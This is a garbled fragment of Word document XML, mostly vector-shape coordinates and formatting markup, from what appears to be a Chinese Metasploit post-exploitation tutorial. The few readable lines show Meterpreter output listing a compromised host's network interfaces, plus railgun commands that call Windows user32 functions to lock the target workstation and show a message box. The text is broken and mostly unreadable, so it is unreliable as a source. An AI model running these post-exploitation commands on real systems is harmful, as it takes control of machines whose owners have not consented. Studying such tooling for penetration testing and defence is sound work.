path="m6537,10574l6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6538,10574,6538,10574,6538,10574,6538,10574,6538,10574,6538,10574,6538,10574,6538,10574,6538,10574,6538,10574,6538,10574,6539,10574,6539,10574,6539,10574,6539,10574,6539,10574,6539,10574,6540,10574,6540,10574,6540,10574,6540,10574,6541,10574,6541,10574,6541,10574,6542,10574,6542,10574,6542,10574,6543,10574,6543,10574,6543,10574,6544,10574,6544,10574,6545,10574,6545,10574,6546,10574,6546,10574,6547,10574,6547,10574,6548,10574,6549,10574,6549,10574,6550,10574,6550,10574,6551,10574,6552,10574,6553,10574,6553,10574,6554,10574,6555,10574,6556,10574,6557,10574,6558,10574,6559,10574,6560,10574,6561,10574,6562,10574,6563,10574,6564,10574,6565,10574,6566,10574,6567,10574,6569,10574,6570,10574,6571,10574,6572,10574,6574,10574,6575,10574,6577,10574,6578,10574,6580,10574,6581,10574,6583,10574,6584,10574,6586,10574,6588,10574,6589,10574,6591,10574,6593,10574,6595,10574,6596,10574,6598,10574,6600,10574,6602,10574,6604,10574,6606,10574,6609,10574,6611,10574,6613,10574,6615,10574,6617,10574,6620,10574,6622,10574,6625,10574,6627,10574,6630,10574,6632,10574,6635,10574,6637,10574,6640,10574,6643,10574,6646,10574,6649,10574,6651,10574,6654,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10575,6657,10575,6657,10575,6657,10575,6657,10575,6657,10575,6657,10575,6657,10575,6657,10575,6657,10576,6657,10576,6657,10576,6657,10576,6657,10576,6657,10577,6657,10577,6657,10577,6657,10578,6657,10578,6657,10578,6657,10579,6657,10579,6657,10580,6657,10580,6657,10581,6657,10581,6657,10582,6657,10583,6657,10583,6657,10584,6657,10585,6657,10586,6657,10586,6657,10587,6657,10588,6657,10589,6657,10590,6657,10591,6657,10592,6657,10593,6657,10594,6657,10596,6657,10597,6657,10598,6657,10600,6657,10601,6657,10602,6657,10604,6657,10605,6657,10607,6657,10609,6657,10610,6657,10612,6657,10614,6657,10616,6657,10618,6657,10620,6657,10622,6657,10624,6657,10626,6657,10629,6657,10631,6657,10633,6657,10636,6657,10638,6657,10641,6657,10643,6657,10646,6657,10649,6657,10652,6657,10655,6657,10658,6657,10661,6657,10664,6657,10667,6657,10671,6657,10674,6657,10678,6657,10681,6657,10685,6657,10688,6657,10692,6657,10696,6657,10700,6657,10704,6657,10708,6657,10713,6657,10717,6657,10721,6657,10726,6657,10730,6657,10735,6657,10740,6657,10745,6657,10750,6657,10755,6657,10760,6657,10765,6657,10770,6657,10776,6657,10781,6657,10787,6657,10793,6657,10799,6657,10805,6657,10811,6657,10817,6657,10823,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6656,10829,6656,10829,6656,10829,6656,10829,6656,10829,6656,10829,6656,10829,6655,10829,6655,10829,6655,10829,6655,10829,6655,10829,6654,10829,6654,10829,6654,10829,6653,10829,6653,10829,6653,10829,6652,10829,6652,10829,6652,10829,6651,10829,6651,10829,6650,10829,6650,10829,6649,10829,6649,10829,6648,10829,6648,10829,6647,10829,6647,10829,6646,10829,6645,10829,6645,10829,6644,10829,6643,10829,6643,10829,6642,10829,6641,10829,6640,10829,6640,10829,6639,10829,6638,10829,6637,10829,6636,10829,6635,10829,6634,10829,6633,10829,6632,10829,6631,10829,6630,10829,6628,10829,6627,10829,6626,10829,6625,10829,6624,10829,6622,10829,6621,10829,6619,10829,6618,10829,6617,10829,6615,10829,6614,10829,6612,10829,6610,10829,6609,10829,6607,10829,6605,10829,6604,10829,6602,10829,6600,10829,6598,10829,6596,10829,6594,10829,6592,10829,6590,10829,6588,10829,6586,10829,6584,10829,6582,10829,6580,10829,6577,10829,6575,10829,6572,10829,6570,10829,6568,10829,6565,10829,6563,10829,6560,10829,6557,10829,6555,10829,6552,10829,6549,10829,6546,10829,6543,10829,6540,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10828,6537,10828,6537,10828,6537,10828,6537,10828,6537,10827,6537,10827,6537,10827,6537,10826,6537,10826,6537,10826,6537,10825,6537,10825,6537,10824,6537,10824,6537,10824,6537,10823,6537,10822,6537,10822,6537,10821,6537,10820,6537,10820,6537,10819,6537,10818,6537,10817,6537,10817,6537,10816,6537,10815,6537,10814,6537,10813,6537,10812,6537,10811,6537,10809,6537,10808,6537,10807,6537,10806,6537,10804,6537,10803,6537,10801,6537,10800,6537,10798,6537,10797,6537,10795,6537,10793,6537,10792,6537,10790,6537,10788,6537,10786,6537,10784,6537,10782,6537,10780,6537,10778,6537,10775,6537,10773,6537,10771,6537,10768,6537,10766,6537,10763,6537,10760,6537,10758,6537,10755,6537,10752,6537,10749,6537,10746,6537,10743,6537,10740,6537,10736,6537,10733,6537,10730,6537,10726,6537,10723,6537,10719,6537,10715,6537,10712,6537,10708,6537,10704,6537,10700,6537,10696,6537,10691,6537,10687,6537,10683,6537,10678,6537,10673,6537,10669,6537,10664,6537,10659,6537,10654,6537,10649,6537,10644,6537,10639,6537,10633,6537,10628,6537,10622,6537,10617,6537,10611,6537,10605,6537,10599,6537,10593,6537,10587,6537,10581,6537,10574e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:307.500pt;margin-top:541.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6150,10830" coordsize="130,270">
        <v:shape style="position:absolute;left:6150;top:10830;width:130;height:270" coordorigin="6150,10830" coordsize="130,270" path="m6162,10844l6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6163,10844,6163,10844,6163,10844,6163,10844,6163,10844,6163,10844,6163,10844,6163,10844,6163,10844,6164,10844,6164,10844,6164,10844,6164,10844,6164,10844,6164,10844,6165,10844,6165,10844,6165,10844,6165,10844,6166,10844,6166,10844,6166,10844,6167,10844,6167,10844,6167,10844,6168,10844,6168,10844,6169,10844,6169,10844,6170,10844,6170,10844,6170,10844,6171,10844,6172,10844,6172,10844,6173,10844,6173,10844,6174,10844,6175,10844,6175,10844,6176,10844,6177,10844,6177,10844,6178,10844,6179,10844,6180,10844,6181,10844,6182,10844,6183,10844,6184,10844,6185,10844,6186,10844,6187,10844,6188,10844,6189,10844,6190,10844,6191,10844,6192,10844,6193,10844,6195,10844,6196,10844,6197,10844,6199,10844,6200,10844,6201,10844,6203,10844,6204,10844,6206,10844,6207,10844,6209,10844,6211,10844,6212,10844,6214,10844,6216,10844,6218,10844,6219,10844,6221,10844,6223,10844,6225,10844,6227,10844,6229,10844,6231,10844,6233,10844,6236,10844,6238,10844,6240,10844,6242,10844,6245,10844,6247,10844,6249,10844,6252,10844,6254,10844,6257,10844,6260,10844,6262,10844,6265,10844,6268,10844,6270,10844,6273,10844,6276,10844,6279,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10845,6282,10845,6282,10845,6282,10845,6282,10845,6282,10845,6282,10845,6282,10845,6282,10845,6282,10845,6282,10845,6282,10845,6282,10846,6282,10846,6282,10846,6282,10846,6282,10846,6282,10847,6282,10847,6282,10847,6282,10847,6282,10848,6282,10848,6282,10849,6282,10849,6282,10849,6282,10850,6282,10850,6282,10851,6282,10852,6282,10852,6282,10853,6282,10853,6282,10854,6282,10855,6282,10856,6282,10856,6282,10857,6282,10858,6282,10859,6282,10860,6282,10861,6282,10862,6282,10863,6282,10865,6282,10866,6282,10867,6282,10868,6282,10870,6282,10871,6282,10873,6282,10874,6282,10876,6282,10877,6282,10879,6282,10881,6282,10882,6282,10884,6282,10886,6282,10888,6282,10890,6282,10892,6282,10894,6282,10896,6282,10899,6282,10901,6282,10903,6282,10906,6282,10908,6282,10911,6282,10914,6282,10916,6282,10919,6282,10922,6282,10925,6282,10928,6282,10931,6282,10934,6282,10937,6282,10941,6282,10944,6282,10948,6282,10951,6282,10955,6282,10959,6282,10962,6282,10966,6282,10970,6282,10974,6282,10978,6282,10983,6282,10987,6282,10991,6282,10996,6282,11000,6282,11005,6282,11010,6282,11015,6282,11020,6282,11025,6282,11030,6282,11035,6282,11041,6282,11046,6282,11052,6282,11057,6282,11063,6282,11069,6282,11075,6282,11081,6282,11087,6282,11093,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6281,11100,6281,11100,6281,11100,6281,11100,6281,11100,6281,11100,6281,11100,6280,11100,6280,11100,6280,11100,6280,11100,6280,11100,6279,11100,6279,11100,6279,11100,6279,11100,6278,11100,6278,11100,6278,11100,6277,11100,6277,11100,6276,11100,6276,11100,6276,11100,6275,11100,6275,11100,6274,11100,6274,11100,6273,11100,6273,11100,6272,11100,6272,11100,6271,11100,6270,11100,6270,11100,6269,11100,6268,11100,6268,11100,6267,11100,6266,11100,6265,11100,6264,11100,6263,11100,6263,11100,6262,11100,6261,11100,6260,11100,6259,11100,6258,11100,6257,11100,6256,11100,6254,11100,6253,11100,6252,11100,6251,11100,6250,11100,6248,11100,6247,11100,6246,11100,6244,11100,6243,11100,6241,11100,6240,11100,6238,11100,6237,11100,6235,11100,6234,11100,6232,11100,6230,11100,6228,11100,6227,11100,6225,11100,6223,11100,6221,11100,6219,11100,6217,11100,6215,11100,6213,11100,6211,11100,6209,11100,6207,11100,6204,11100,6202,11100,6200,11100,6197,11100,6195,11100,6192,11100,6190,11100,6187,11100,6185,11100,6182,11100,6179,11100,6177,11100,6174,11100,6171,11100,6168,11100,6165,11100,6162,11100,6162,11100,6162,11100,6162,11100,6162,11100,6162,11100,6162,11100,6162,11100,6162,11100,6162,11100,6162,11099,6162,11099,6162,11099,6162,11099,6162,11099,6162,11099,6162,11099,6162,11099,6162,11099,6162,11099,6162,11099,6162,11098,6162,11098,6162,11098,6162,11098,6162,11097,6162,11097,6162,11097,6162,11097,6162,11096,6162,11096,6162,11096,6162,11095,6162,11095,6162,11094,6162,11094,6162,11093,6162,11093,6162,11092,6162,11091,6162,11091,6162,11090,6162,11089,6162,11088,6162,11088,6162,11087,6162,11086,6162,11085,6162,11084,6162,11083,6162,11082,6162,11081,6162,11080,6162,11078,6162,11077,6162,11076,6162,11074,6162,11073,6162,11072,6162,11070,6162,11068,6162,11067,6162,11065,6162,11064,6162,11062,6162,11060,6162,11058,6162,11056,6162,11054,6162,11052,6162,11050,6162,11048,6162,11045,6162,11043,6162,11041,6162,11038,6162,11036,6162,11033,6162,11030,6162,11028,6162,11025,6162,11022,6162,11019,6162,11016,6162,11013,6162,11010,6162,11007,6162,11003,6162,11000,6162,10996,6162,10993,6162,10989,6162,10986,6162,10982,6162,10978,6162,10974,6162,10970,6162,10966,6162,10961,6162,10957,6162,10953,6162,10948,6162,10944,6162,10939,6162,10934,6162,10929,6162,10924,6162,10919,6162,10914,6162,10909,6162,10904,6162,10898,6162,10893,6162,10887,6162,10881,6162,10875,6162,10869,6162,10863,6162,10857,6162,10851,6162,10844e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:313.500pt;margin-top:541.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6270,10830" coordsize="130,270">
        <v:shape style="position:absolute;left:6270;top:10830;width:130;height:270" coordorigin="6270,10830" coordsize="130,270" path="m6282,10844l6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6283,10844,6283,10844,6283,10844,6283,10844,6283,10844,6283,10844,6283,10844,6283,10844,6283,10844,6283,10844,6284,10844,6284,10844,6284,10844,6284,10844,6284,10844,6284,10844,6285,10844,6285,10844,6285,10844,6285,10844,6286,10844,6286,10844,6286,10844,6287,10844,6287,10844,6287,10844,6288,10844,6288,10844,6289,10844,6289,10844,6290,10844,6290,10844,6291,10844,6291,10844,6292,10844,6292,10844,6293,10844,6293,10844,6294,10844,6295,10844,6295,10844,6296,10844,6297,10844,6298,10844,6298,10844,6299,10844,6300,10844,6301,10844,6302,10844,6303,10844,6304,10844,6305,10844,6306,10844,6307,10844,6308,10844,6309,10844,6310,10844,6311,10844,6312,10844,6313,10844,6315,10844,6316,10844,6317,10844,6319,10844,6320,10844,6321,10844,6323,10844,6324,10844,6326,10844,6327,10844,6329,10844,6331,10844,6332,10844,6334,10844,6336,10844,6338,10844,6339,10844,6341,10844,6343,10844,6345,10844,6347,10844,6349,10844,6351,10844,6353,10844,6356,10844,6358,10844,6360,10844,6362,10844,6365,10844,6367,10844,6369,10844,6372,10844,6374,10844,6377,10844,6380,10844,6382,10844,6385,10844,6388,10844,6391,10844,6393,10844,6396,10844,6399,10844,6402,10844,6402,10844,6402,10844,6402,10844,6402,10844,6402,10844,6402,10844,6402,10844,6402,10845,6402,10845,6402,10845,6402,10845,6402,10845,6402,10845,6402,10845,6402,10845,6402,10845,6402,10845,6402,10845,6402,10845,6402,10846,6402,10846,6402,10846,6402,10846,6402,10846,6402,10847,6402,10847,6402,10847,6402,10847,6402,10848,6402,10848,6402,10849,6402,10849,6402,10849,6402,10850,6402,10850,6402,10851,6402,10852,6402,10852,6402,10853,6402,10853,6402,10854,6402,10855,6402,10856,6402,10856,6402,10857,6402,10858,6402,10859,6402,10860,6402,10861,6402,10862,6402,10863,6402,10865,6402,10866,6402,10867,6402,10868,6402,10870,6402,10871,6402,10873,6402,10874,6402,10876,6402,10877,6402,10879,6402,10881,6402,10882,6402,10884,6402,10886,6402,10888,6402,10890,6402,10892,6402,10894,6402,10896,6402,10899,6402,10901,6402,10903,6402,10906,6402,10908,6402,10911,6402,10914,6402,10916,6402,10919,6402,10922,6402,10925,6402,10928,6402,10931,6402,10934,6402,10937,6402,10941,6402,10944,6402,10948,6402,10951,6402,10955,6402,10959,6402,10962,6402,10966,6402,10970,6402,10974,6402,10978,6402,10983,6402,10987,6402,10991,6402,10996,6402,11000,6402,11005,6402,11010,6402,11015,6402,11020,6402,11025,6402,11030,6402,11035,6402,11041,6402,11046,6402,11052,6402,11057,6402,11063,6402,11069,6402,11075,6402,11081,6402,11087,6402,11093,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6401,11100,6401,11100,6401,11100,6401,11100,6401,11100,6401,11100,6401,11100,6400,11100,6400,11100,6400,11100,6400,11100,6400,11100,6399,11100,6399,11100,6399,11100,6399,11100,6398,11100,6398,11100,6398,11100,6397,11100,6397,11100,6397,11100,6396,11100,6396,11100,6395,11100,6395,11100,6394,11100,6394,11100,6393,11100,6393,11100,6392,11100,6392,11100,6391,11100,6390,11100,6390,11100,6389,11100,6388,11100,6388,11100,6387,11100,6386,11100,6385,11100,6384,11100,6384,11100,6383,11100,6382,11100,6381,11100,6380,11100,6379,11100,6378,11100,6377,11100,6376,11100,6375,11100,6373,11100,6372,11100,6371,11100,6370,11100,6368,11100,6367,11100,6366,11100,6364,11100,6363,11100,6361,11100,6360,11100,6358,11100,6357,11100,6355,11100,6354,11100,6352,11100,6350,11100,6349,11100,6347,11100,6345,11100,6343,11100,6341,11100,6339,11100,6337,11100,6335,11100,6333,11100,6331,11100,6329,11100,6327,11100,6324,11100,6322,11100,6320,11100,6317,11100,6315,11100,6312,11100,6310,11100,6307,11100,6305,11100,6302,11100,6299,11100,6297,11100,6294,11100,6291,11100,6288,11100,6285,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11099,6282,11099,6282,11099,6282,11099,6282,11099,6282,11099,6282,11099,6282,11099,6282,11099,6282,11099,6282,11099,6282,11098,6282,11098,6282,11098,6282,11098,6282,11097,6282,11097,6282,11097,6282,11097,6282,11096,6282,11096,6282,11096,6282,11095,6282,11095,6282,11094,6282,11094,6282,11093,6282,11093,6282,11092,6282,11091,6282,11091,6282,11090,6282,11089,6282,11088,6282,11088,6282,11087,6282,11086,6282,11085,6282,11084,6282,11083,6282,11082,6282,11081,6282,11080,6282,11078,6282,11077,6282,11076,6282,11074,6282,11073,6282,11072,6282,11070,6282,11068,6282,11067,6282,11065,6282,11064,6282,11062,6282,11060,6282,11058,6282,11056,6282,11054,6282,11052,6282,11050,6282,11048,6282,11045,6282,11043,6282,11041,6282,11038,6282,11036,6282,11033,6282,11030,6282,11028,6282,11025,6282,11022,6282,11019,6282,11016,6282,11013,6282,11010,6282,11007,6282,11003,6282,11000,6282,10996,6282,10993,6282,10989,6282,10986,6282,10982,6282,10978,6282,10974,6282,10970,6282,10966,6282,10961,6282,10957,6282,10953,6282,10948,6282,10944,6282,10939,6282,10934,6282,10929,6282,10924,6282,10919,6282,10914,6282,10909,6282,10904,6282,10898,6282,10893,6282,10887,6282,10881,6282,10875,6282,10869,6282,10863,6282,10857,6282,10851,6282,10844e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:560.500pt;width:12.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,11210" coordsize="250,250">
        <v:shape style="position:absolute;left:1950;top:11210;width:250;height:250" coordorigin="1950,11210" coordsize="250,250" path="m1975,11220l1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1976,11220,1976,11220,1976,11220,1976,11220,1976,11220,1976,11220,1977,11220,1977,11220,1977,11220,1977,11220,1977,11220,1978,11220,1978,11220,1978,11220,1979,11220,1979,11220,1980,11220,1980,11220,1981,11220,1981,11220,1982,11220,1982,11220,1983,11220,1983,11220,1984,11220,1985,11220,1986,11220,1986,11220,1987,11220,1988,11220,1989,11220,1990,11220,1991,11220,1992,11220,1993,11220,1994,11220,1995,11220,1996,11220,1997,11220,1999,11220,2000,11220,2001,11220,2003,11220,2004,11220,2006,11220,2007,11220,2009,11220,2011,11220,2012,11220,2014,11220,2016,11220,2018,11220,2020,11220,2022,11220,2024,11220,2026,11220,2028,11220,2030,11220,2033,11220,2035,11220,2038,11220,2040,11220,2043,11220,2045,11220,2048,11220,2051,11220,2054,11220,2056,11220,2059,11220,2063,11220,2066,11220,2069,11220,2072,11220,2075,11220,2079,11220,2082,11220,2086,11220,2090,11220,2093,11220,2097,11220,2101,11220,2105,11220,2109,11220,2113,11220,2117,11220,2122,11220,2126,11220,2131,11220,2135,11220,2140,11220,2145,11220,2150,11220,2154,11220,2160,11220,2165,11220,2170,11220,2175,11220,2181,11220,2186,11220,2192,11220,2197,11220,2203,11220,2209,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11221,2215,11221,2215,11221,2215,11221,2215,11221,2215,11221,2215,11222,2215,11222,2215,11222,2215,11223,2215,11223,2215,11223,2215,11224,2215,11224,2215,11225,2215,11225,2215,11226,2215,11226,2215,11227,2215,11227,2215,11228,2215,11229,2215,11229,2215,11230,2215,11231,2215,11232,2215,11233,2215,11233,2215,11234,2215,11235,2215,11236,2215,11237,2215,11239,2215,11240,2215,11241,2215,11242,2215,11243,2215,11245,2215,11246,2215,11248,2215,11249,2215,11251,2215,11252,2215,11254,2215,11256,2215,11258,2215,11259,2215,11261,2215,11263,2215,11265,2215,11267,2215,11269,2215,11272,2215,11274,2215,11276,2215,11279,2215,11281,2215,11284,2215,11286,2215,11289,2215,11291,2215,11294,2215,11297,2215,11300,2215,11303,2215,11306,2215,11309,2215,11313,2215,11316,2215,11319,2215,11323,2215,11326,2215,11330,2215,11334,2215,11338,2215,11341,2215,11345,2215,11349,2215,11354,2215,11358,2215,11362,2215,11367,2215,11371,2215,11376,2215,11380,2215,11385,2215,11390,2215,11395,2215,11400,2215,11405,2215,11410,2215,11416,2215,11421,2215,11427,2215,11432,2215,11438,2215,11444,2215,11450,2215,11456,2215,11462,2215,11468,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2214,11475,2214,11475,2214,11475,2214,11475,2214,11475,2214,11475,2213,11475,2213,11475,2213,11475,2213,11475,2212,11475,2212,11475,2212,11475,2211,11475,2211,11475,2210,11475,2210,11475,2210,11475,2209,11475,2208,11475,2208,11475,2207,11475,2207,11475,2206,11475,2205,11475,2205,11475,2204,11475,2203,11475,2202,11475,2201,11475,2200,11475,2199,11475,2198,11475,2197,11475,2196,11475,2195,11475,2194,11475,2193,11475,2191,11475,2190,11475,2189,11475,2187,11475,2186,11475,2184,11475,2183,11475,2181,11475,2179,11475,2178,11475,2176,11475,2174,11475,2172,11475,2170,11475,2168,11475,2166,11475,2164,11475,2162,11475,2160,11475,2157,11475,2155,11475,2153,11475,2150,11475,2147,11475,2145,11475,2142,11475,2139,11475,2137,11475,2134,11475,2131,11475,2128,11475,2124,11475,2121,11475,2118,11475,2115,11475,2111,11475,2108,11475,2104,11475,2101,11475,2097,11475,2093,11475,2089,11475,2085,11475,2081,11475,2077,11475,2073,11475,2068,11475,2064,11475,2059,11475,2055,11475,2050,11475,2045,11475,2041,11475,2036,11475,2031,11475,2025,11475,2020,11475,2015,11475,2010,11475,2004,11475,1998,11475,1993,11475,1987,11475,1981,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11474,1975,11474,1975,11474,1975,11474,1975,11474,1975,11474,1975,11474,1975,11474,1975,11473,1975,11473,1975,11473,1975,11473,1975,11472,1975,11472,1975,11472,1975,11471,1975,11471,1975,11471,1975,11470,1975,11470,1975,11469,1975,11469,1975,11468,1975,11468,1975,11467,1975,11466,1975,11466,1975,11465,1975,11464,1975,11464,1975,11463,1975,11462,1975,11461,1975,11460,1975,11459,1975,11458,1975,11457,1975,11456,1975,11455,1975,11453,1975,11452,1975,11451,1975,11450,1975,11448,1975,11447,1975,11445,1975,11444,1975,11442,1975,11440,1975,11439,1975,11437,1975,11435,1975,11433,1975,11431,1975,11429,1975,11427,1975,11425,1975,11423,1975,11421,1975,11418,1975,11416,1975,11413,1975,11411,1975,11408,1975,11406,1975,11403,1975,11400,1975,11397,1975,11394,1975,11391,1975,11388,1975,11385,1975,11382,1975,11378,1975,11375,1975,11372,1975,11368,1975,11364,1975,11361,1975,11357,1975,11353,1975,11349,1975,11345,1975,11341,1975,11337,1975,11332,1975,11328,1975,11323,1975,11319,1975,11314,1975,11309,1975,11304,1975,11300,1975,11294,1975,11289,1975,11284,1975,11279,1975,11273,1975,11268,1975,11262,1975,11256,1975,11250,1975,11245,1975,11238,1975,11232,1975,11226,1975,11220e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:614.400pt;width:467.400pt;height:39.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MTU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1520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IPv4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127.0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.0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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114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23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#&lt;Rex::Post::Meterpreter::Extensions::Stdapi::Net::Interface:0x000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055aee92c5770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@index=65539,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@mac_addr="\x00\f)\x85\xD6}",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@mac_name="Inte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l(R)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PRO/1000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MT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Network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Connection",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@mtu=1500,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@flags=nil,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@addrs=["19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2.168.1.119"],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@netmasks=["255.255.255.0"],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@scopes=[]&gt;,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erpreter::Extensions::Stdapi::Net::Interface:0x000055aee92c5220</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@index=1,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@mac_addr="",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@mac_name="MS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Loopback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interface",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@mtu=1520,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@flags=ni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l,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@addrs=["127.0.0.1"],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@netmasks=[],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@scopes=[]&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="109" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="9503" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="2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31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25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锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>定注销目标机：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railgun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user32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LockWorkStation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{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"GetLastError"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"ErrorMessage"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"\xB2\xD9\xD7\xF7\xB3\xC9\xB9\x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A6\xCD\xEA\xB3\xC9\xA1\xA3"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"return"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true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9593" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="30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996c38"/>
          <w:spacing w:val="40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9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调用Mes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sageBox：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railgun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user32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MessageBoxA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"Micropoor"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"Micropoor"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"MB_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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OK"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282.500pt;width:0.500pt;height:52.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,5650" coordsize="10,1050">
        <v:shape style="position:absolute;left:10390;top:5650;width:10;height:1050" coordorigin="10390,5650" coordsize="10,1050" path="m10402,5667l10402,5667,10402,5667,10402,5667,10402,5667,10402,5667,10402,5667,10402,5667,10402,5667,10402,5667,10402,5667,10402,5667,10402,5668,10402,5668,10402,5668,10402,5669,10402,5669,10402,5669,10402,5670,10402,5670,10402,5671,10402,5672,10402,5673,10402,5673,10402,5674,10402,5675,10402,5676,10402,5678,10402,5679,10402,5680,10402,5682,10402,5683,10402,5685,10402,5687,10402,5689,10402,5691,10402,5693,10402,5696,10402,5698,10402,5701,10402,5703,10402,5706,10402,5709,10402,5712,10402,5716,10402,5719,10402,5723,10402,5727,10402,5731,10402,5735,10402,5739,10402,5744,10402,5748,10402,5753,10402,5758,10402,5764,10402,5769,10402,5775,10402,5781,10402,5787,10402,5793,10402,5800,10402,5806,10402,5813,10402,5821,10402,5828,10402,5836,10402,5844,10402,5852,10402,5860,10402,5869,10402,5878,10402,5887,10402,5896,10402,5906,10402,5916,10402,5926,10402,5937,10402,5947,10402,5958,10402,5970,10402,5981,10402,5993,10402,6006,10402,6018,10402,6031,10402,6044,10402,6058,10402,6072,10402,6086,10402,6100,10402,6115,10402,6130,10402,6145,10402,6161,10402,6177,10402,6194,10402,6211,10402,6228,10402,6245,10402,6263,10402,6281,10402,6300,10402,6319,10402,6338,10402,6358,10402,6378,10402,6399,10402,6420,10402,6441,10402,6463,10402,6485,10402,6507,10402,6530,10402,6554,10402,6577,10402,6601,10402,6626,10402,6651,10402,6676,10402,6702e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:282.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,5650" coordsize="8990,390">
